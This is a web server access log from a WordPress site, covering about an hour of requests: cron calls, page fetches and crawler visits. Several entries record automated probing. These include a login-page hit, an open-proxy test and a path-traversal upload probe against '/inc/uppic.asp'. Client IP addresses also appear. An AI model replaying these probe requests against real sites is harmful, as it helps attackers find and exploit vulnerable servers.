205.169.39.12 - - [23/Oct/2025:08:31:26 +0800] "GET / HTTP/1.1" 200 33932 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Oct/2025:08:37:58 +0800] "POST /wp-cron.php?doing_wp_cron=1761179878.2228100299835205078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
144.202.82.88 - - [23/Oct/2025:08:37:58 +0800] "GET http://example.com/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
144.202.82.88 - - [23/Oct/2025:08:37:58 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 33932 "http://example.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Oct/2025:08:43:07 +0800] "POST /wp-cron.php?doing_wp_cron=1761180186.9668490886688232421875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
178.62.226.48 - - [23/Oct/2025:08:43:07 +0800] "GET /wp-login.php HTTP/1.1" 200 2781 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0"
123.254.107.95 - - [23/Oct/2025:08:51:59 +0800] "HEAD / HTTP/1.1" 200 0 "http://cqqizhou.com" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0); 360Spider"
36.133.115.36 - - [23/Oct/2025:08:51:59 +0800] "POST /wp-cron.php?doing_wp_cron=1761180719.7657411098480224609375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
123.254.107.95 - - [23/Oct/2025:08:51:59 +0800] "GET /inc/uppic.asp?up=../../uploadfile/News_Title/&tup=textimg HTTP/1.1" 404 31381 "http://cqqizhou.com/inc/uppic.asp?up=../../uploadfile/News_Title/&tup=textimg" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0); 360Spider"
36.133.115.36 - - [23/Oct/2025:09:15:12 +0800] "POST /wp-cron.php?doing_wp_cron=1761182112.0448620319366455078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [23/Oct/2025:09:15:12 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Oct/2025:09:19:18 +0800] "POST /wp-cron.php?doing_wp_cron=1761182358.5208940505981445312500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
207.90.244.28 - - [23/Oct/2025:09:19:18 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
207.90.244.28 - - [23/Oct/2025:09:19:22 +0800] "GET / HTTP/1.1" 200 153674 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
207.90.244.28 - - [23/Oct/2025:09:19:25 +0800] "GET /robots.txt HTTP/1.1" 200 390 "-" "-"
207.90.244.28 - - [23/Oct/2025:09:19:29 +0800] "GET /sitemap.xml HTTP/1.1" 200 2409 "-" "-"
207.90.244.28 - - [23/Oct/2025:09:19:32 +0800] "GET /.well-known/security.txt HTTP/1.1" 404 31381 "-" "-"
120.92.72.88 - - [23/Oct/2025:09:40:20 +0800] "GET / HTTP/1.1" 200 33932 "-" "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv 11.0) like Gecko"
36.133.115.36 - - [23/Oct/2025:09:40:24 +0800] "POST /wp-cron.php?doing_wp_cron=1761183623.9918220043182373046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
120.92.72.108 - - [23/Oct/2025:09:40:24 +0800] "GET /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv 11.0) like Gecko"
120.92.72.88 - - [23/Oct/2025:09:40:24 +0800] "GET /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "http://cqqizhou.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Mobile Safari/537.36"
103.115.64.61 - - [23/Oct/2025:09:45:35 +0800] "HEAD / HTTP/1.1" 200 0 "http://cqqizhou.com" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0); 360Spider"
36.133.115.36 - - [23/Oct/2025:09:45:36 +0800] "POST /wp-cron.php?doing_wp_cron=1761183936.0884470939636230468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
